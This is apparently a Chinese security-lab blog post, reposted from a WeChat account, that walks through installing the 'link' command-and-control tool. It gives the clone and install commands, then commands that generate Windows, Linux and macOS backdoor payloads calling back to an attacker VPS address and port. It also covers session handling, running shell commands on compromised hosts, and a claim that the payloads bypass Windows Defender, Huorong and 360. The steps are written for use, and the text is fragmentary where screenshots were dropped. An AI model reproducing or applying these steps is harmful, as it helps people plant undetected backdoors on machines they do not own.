破军安全实验室 本文约1150字,阅读约需3分钟。 0x00 前言 0x01 安装 命令如下 结束后后直接重启,因为 rust 安装完后需要重启⽣效 : 重启后,再次进⼊到/link⽂件夹下,运⾏启动命令: 然后进⼊到link的管理模式下:
主要⽤到前三条:在 Windows, MacOS , Linux 中⽣成载荷:(目前Windows后门和linux载荷测试成功上线,苹果载荷暂未测试。)
0x02 Windows 上线: ⽣成Windows后⻔(过程相当漫⻓,请耐⼼等待): 成功生成windows后门文件: 运⾏link.exe 后上线: 进⼊到当前会话 links -i 会话ID :
0x03 Linux上线: ⽣成后⻔: 然后上传到⽬标运⾏ ,成功上线,然后就是Linux上线后的操作: 执⾏命令: shell linux命令:
0x04 ByPass 通过测试发现,Windows Defender、⽕绒、 360 动态、静态都可过:
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,破军安全实验室及文章作者不为此承担任何责任。 破军安全实验室拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经破军安全实验室允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 破军安全实验室 # 长按二维码 关注我们 #
https://github.com/postrequest/link
git clonehttps://github.com/postrequest/linkcd link/./kali-install.sh执⾏后
会出现这个⻚⾯后,三个选项分别是:
1、继续安装(默认安装)2、⾃定义安装3、取消安装
这⾥选择 1 默认安装即可
安装过程较为漫⻓,需要等待下⾯进度条结束:
./target/release/link启动后,会让你设置⼀个监听端⼝,这个端⼝也是后续shellcode中的端⼝ :
generate vps-ip:port //⽣成windows 后⻔generate-osx vps-ip:port //⽣成苹果载荷generate-linux vps-ip:port //⽣成 linux 载荷
查看当前会话:links ,类似MSF的Sessions
进⼊到当前会话中后 可以执⾏命令 whoami
原文始发于微信公众号(破军安全实验室):一款小巧的c2上线工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论